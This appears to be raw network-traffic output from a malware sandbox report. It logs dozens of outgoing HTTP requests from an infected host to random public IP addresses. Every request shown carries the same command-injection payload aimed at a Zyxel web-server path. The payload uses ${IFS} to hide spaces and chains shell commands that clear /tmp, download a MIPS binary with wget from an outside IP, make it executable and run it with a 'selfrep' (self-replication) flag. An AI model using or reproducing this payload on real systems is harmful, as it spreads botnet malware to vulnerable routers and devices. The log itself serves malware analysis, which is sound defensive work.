                                        Jan 14, 2024 16:18:35.235052109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1912192.168.2.1348478178.138.85.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.235105038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1913192.168.2.1358898202.176.20.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.235151052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1914192.168.2.1350286152.11.104.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.235200882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1915192.168.2.1334676154.131.234.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.235234022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1916192.168.2.1337504148.141.148.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.235269070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1917192.168.2.135410827.42.124.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.235301971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1918192.168.2.134220279.202.35.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.235344887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1919192.168.2.134696887.227.187.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.235420942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1920192.168.2.1341456133.188.242.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.235423088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1921192.168.2.134893896.34.187.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.238852978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1922192.168.2.1339080220.116.166.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.238874912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1923192.168.2.1341040115.179.97.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.238917112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1924192.168.2.134379463.35.222.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.238950014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1925192.168.2.135816234.209.86.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.238989115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1926192.168.2.1347906129.68.229.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.239012957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1927192.168.2.134545443.41.186.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.239051104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1928192.168.2.134390619.154.23.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.239083052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1929192.168.2.1339680222.1.249.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.239120960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1930192.168.2.1353338115.19.28.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.239180088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1931192.168.2.134085052.2.116.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.239212036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1932192.168.2.133622844.88.14.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.239263058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1933192.168.2.1353102204.254.196.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.239281893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1934192.168.2.1357984148.120.38.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249042034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1935192.168.2.136051294.2.163.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249063015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1936192.168.2.1342036152.127.152.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249130011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1937192.168.2.1352444113.72.251.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249166965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1938192.168.2.1359748125.138.183.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249217987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1939192.168.2.135374289.86.186.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249247074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1940192.168.2.135854687.163.200.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249264956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1941192.168.2.1360192120.199.160.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249309063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1942192.168.2.134707434.39.246.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249342918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1943192.168.2.133859073.197.229.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249362946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1944192.168.2.1341150144.127.66.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249424934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1945192.168.2.1355796157.15.171.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249433994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1946192.168.2.1355920140.148.93.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249486923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1947192.168.2.1349160217.111.230.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249514103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1948192.168.2.1346458176.115.238.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249537945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1949192.168.2.1349772124.92.133.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249605894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1950192.168.2.1352194135.99.222.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249628067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1951192.168.2.1348488159.248.243.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249660015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1952192.168.2.1345808145.84.183.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249716997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1953192.168.2.1349986220.120.219.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249751091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1954192.168.2.1350942137.30.2.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249766111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1955192.168.2.1348180137.111.233.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249831915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1956192.168.2.1345934116.60.81.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249874115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1957192.168.2.1347268120.241.17.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249946117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1958192.168.2.1356198143.175.74.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.249980927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1959192.168.2.1348800156.153.162.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250041008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1960192.168.2.1352684203.160.18.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250068903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1961192.168.2.1334118130.112.21.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250098944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1962192.168.2.135051242.144.178.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250170946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1963192.168.2.1351318219.51.0.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250201941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1964192.168.2.135233814.38.40.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250233889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1965192.168.2.1349454172.11.150.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250292063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1966192.168.2.134813479.38.207.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250341892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1967192.168.2.1352034195.182.86.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250370979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1968192.168.2.1355170162.37.195.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250422955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1969192.168.2.1335086206.142.232.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250461102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1970192.168.2.133888461.96.165.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250498056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1971192.168.2.134426675.96.42.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250555038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1972192.168.2.135716247.131.46.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250587940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1973192.168.2.1346522199.143.52.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.250628948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1974192.168.2.133351072.80.98.254443
                                        TimestampBytes transferredDirectionData
